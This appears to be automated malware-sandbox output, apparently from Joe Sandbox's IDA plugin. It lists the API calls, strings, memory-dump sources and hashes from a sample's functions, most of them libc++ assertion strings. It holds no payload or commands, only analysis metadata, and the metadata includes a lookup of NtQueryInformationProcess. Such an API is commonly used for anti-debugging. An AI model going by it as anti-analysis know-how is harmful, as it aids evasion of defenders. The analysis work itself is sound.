                                                                                                                        • ..\..\third_party\libc++\src\include\string:2849: assertion __s != nullptr failed: string::append received nullptr, xrefs: 00898756
                                                                                                                        • 7S, xrefs: 00898934
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:2849: assertion __s != nullptr failed: string::append received nullptr$7S
                                                                                                                        • API String ID: 4218353326-2554461371
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008F429D
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2706: assertion __s != nullptr failed: string::assign received nullptr, xrefs: 008F4289
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008F441C
                                                                                                                        • bran, xrefs: 008F41B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string:2706: assertion __s != nullptr failed: string::assign received nullptr$bran
                                                                                                                        • API String ID: 3738618077-797417629
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • .log, xrefs: 008766C3, 008766D1, 00876723
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2971: assertion __s != nullptr failed: string::insert received nullptr, xrefs: 008767A1
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0087679A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:2971: assertion __s != nullptr failed: string::insert received nullptr$.log
                                                                                                                        • API String ID: 4218353326-3763197184
                                                                                                                        • Opcode ID: 1bf08d99524fb41e52ddf6e2022a0f3565bf4f41ae343ab2d99cf1242b0bade6
                                                                                                                        • Instruction ID: fefc09e6aaa1f12742a87d22ccbf2b67104a030cb4d41df1ece29674fd87bf67
                                                                                                                        • Opcode Fuzzy Hash: 1bf08d99524fb41e52ddf6e2022a0f3565bf4f41ae343ab2d99cf1242b0bade6
                                                                                                                        • Instruction Fuzzy Hash: 2E514770D046099FDF14DFA4C880AEEFBB1FF55358F148229E40AB7251E730A855CB51
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00836598
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0083666E
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00836675
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00836630
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 24740636-2860972271
                                                                                                                        • Opcode ID: 96f1f01ebcc49d0c3f347a5425f7247b14cbd4dd4892c9672a2c30ae251f48e6
                                                                                                                        • Instruction ID: 802d61a68663a43f094318e6d929ab3416e0f10e9dd24e882ebe1bb2a1f9540b
                                                                                                                        • Opcode Fuzzy Hash: 96f1f01ebcc49d0c3f347a5425f7247b14cbd4dd4892c9672a2c30ae251f48e6
                                                                                                                        • Instruction Fuzzy Hash: 3D41E270610314AFCB14EB2CD88697A77A5FF90714B188428E447D7A92FB61F915CBD2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00834E2C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00834E25
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00834E33
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 4218353326-4247613780
                                                                                                                        • Opcode ID: 150524be8be91a5a2c08cf77c66dfc7326dc548641c6474de0e82d0d705828ac
                                                                                                                        • Instruction ID: e670f8eac00972d44842fa1929a39407c9fc031f8e424385f7069b308f097558
                                                                                                                        • Opcode Fuzzy Hash: 150524be8be91a5a2c08cf77c66dfc7326dc548641c6474de0e82d0d705828ac
                                                                                                                        • Instruction Fuzzy Hash: 8541AD71A042159FCB18DF28D881AABBBA5FFC9314F058199EC05DB246D770E950CBE1
                                                                                                                        APIs
                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0091CC93,?,?,00000000,00000000,00000000,?), ref: 0091CDB2
                                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0091CE98
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CatchEncodePointer
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 1435073870-2084237596
                                                                                                                        • Opcode ID: 8d4019e80e60a8d7e98fb82944ba816ed34b0744612a114db00453ddcd577d66
                                                                                                                        • Instruction ID: 944819000f9288c862800a094e581a5fdc4c4634aac8ad822788146edc4b5431
                                                                                                                        • Opcode Fuzzy Hash: 8d4019e80e60a8d7e98fb82944ba816ed34b0744612a114db00453ddcd577d66
                                                                                                                        • Instruction Fuzzy Hash: 874157B2A4020DAFCF16DF98D881AEEBBB9FF48300F198059F905A6251D335DD91DB51
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008C69FA
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008C69EB
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008C6A01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds
                                                                                                                        • API String ID: 4218353326-378835045
                                                                                                                        • Opcode ID: 32104bc442085d8eca295f6201d052735ed049d037f2d72a73e77110fff7ca93
                                                                                                                        • Instruction ID: ed24d80a7639177b702e54d188278908ca7280125087f3427d47c05db2e9ba41
                                                                                                                        • Opcode Fuzzy Hash: 32104bc442085d8eca295f6201d052735ed049d037f2d72a73e77110fff7ca93
                                                                                                                        • Instruction Fuzzy Hash: 7641B170E042198BCB14CF59D891BAABFB4FF59304B15813EE985EB301F6719859C791
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$do-not-launch-browser
                                                                                                                        • API String ID: 4218353326-2519540672
                                                                                                                        • Opcode ID: 5798679e0e26c18ce6a32d939ce3ecabceacd88c2d1c8cac90ff6a68b13ae826
                                                                                                                        • Instruction ID: df87111bf211530c84bcf22b200132c591ced4e6482dbc200a5b7a1736398cf1
                                                                                                                        • Opcode Fuzzy Hash: 5798679e0e26c18ce6a32d939ce3ecabceacd88c2d1c8cac90ff6a68b13ae826
                                                                                                                        • Instruction Fuzzy Hash: 1B315AA1D0829DAECF207BE4D845BAFBAA4EF51304F144439E901E7182E76109848BD2
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • %s:%d: %s, xrefs: 008B0605
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 008B063D
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B0644
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strrchr
                                                                                                                        • String ID: %s:%d: %s$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range
                                                                                                                        • API String ID: 3213747228-1124368739
                                                                                                                        • Opcode ID: 21f0b48dd14c8e5c56d5587217dbcafdc7484ed645c47d981ac7cd97b20aad65
                                                                                                                        • Instruction ID: c7cc00c60f4f99e90ccab329dee33cefab08e1b270c366215c7101bd4f17076d
                                                                                                                        • Opcode Fuzzy Hash: 21f0b48dd14c8e5c56d5587217dbcafdc7484ed645c47d981ac7cd97b20aad65
                                                                                                                        • Instruction Fuzzy Hash: DF31C271A0430A9FDB24DE68C891FEFB7A4FF95704F14042DE446E7742EB60A9158FA1
                                                                                                                        APIs
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 008C847E
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 008C84A2
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2489: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr, xrefs: 008C859B
                                                                                                                        • \StringFileInfo\%04x%04x\%ls, xrefs: 008C84E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DefaultLangUser
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string:2489: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr$\StringFileInfo\%04x%04x\%ls
                                                                                                                        • API String ID: 768647712-234056397
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • Histogram.MismatchedConstructionArguments, xrefs: 008ACB09
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008ACC65
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008ACD3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds$Histogram.MismatchedConstructionArguments
                                                                                                                        • API String ID: 4218353326-961035493
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B6A8C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B6A85
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B6A93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 4218353326-4247613780
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,009659FC), ref: 0089CAF8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 0089CB04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: NtQueryInformationProcess$ntdll.dll
                                                                                                                        • API String ID: 1646373207-2906145389
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0092A703,00000011,00000001,00000000,?,?,?,0092A5C1,00000002,FlsGetValue,00938284,0093828C), ref: 0092A674
                                                                                                                        • GetLastError.KERNEL32(?,0092A703,00000011,00000001,00000000,?,?,?,0092A5C1,00000002,FlsGetValue,00938284,0093828C,00000011,?,0091C10C), ref: 0092A67E
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000011,?,0091C10C), ref: 0092A6A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(bcryptprimitives), ref: 008F0878
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 008F0888
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: ProcessPrng$bcryptprimitives
                                                                                                                        • API String ID: 2574300362-1205050517
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
